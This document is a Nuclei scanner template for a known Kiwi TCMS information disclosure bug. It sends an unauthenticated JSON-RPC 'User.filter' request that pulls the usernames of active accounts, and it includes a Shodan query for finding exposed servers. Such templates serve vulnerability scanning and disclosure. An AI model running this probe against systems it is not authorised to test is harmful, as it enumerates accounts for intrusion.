id: kiwitcms-json-rpc info: name: Kiwi TCMS Information Disclosure author: act1on3 severity: high description: Internal info exposed in Kiwi TCMS. reference: - https://hackerone.com/reports/968402 - https://kiwitcms.org/blog/kiwi-tcms-team/2020/08/23/kiwi-tcms-86/ - https://github.com/act1on3/nuclei-templates/blob/master/vulnerabilities/kiwi-information-disclosure.yaml metadata: max-request: 1 shodan-query: title:"Kiwi TCMS - Login" http.favicon.hash:-1909533337 tags: kiwitcms,exposure,misconfig,hackerone http: - raw: - | POST /json-rpc/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/json Accept-Encoding: gzip, deflate {"jsonrpc":"2.0","method":"User.filter","id": 1,"params":{"query":{"is_active":true}}} matchers-condition: and matchers: - type: status status: - 200 - type: word part: body words: - result - username - jsonrpc - is_active condition: and extractors: - type: json part: body json: - .result[].username # digest: 4a0a00473045022100e625a29f9198b07723d4e26329a8d2d947c7240aadf04e2859b0f6dff1acdead02200b19f7aac7e79222c4418add2934c0704dab1ee621e7b45540127028968ed156:922c64590222798bb761d5b6d8e72950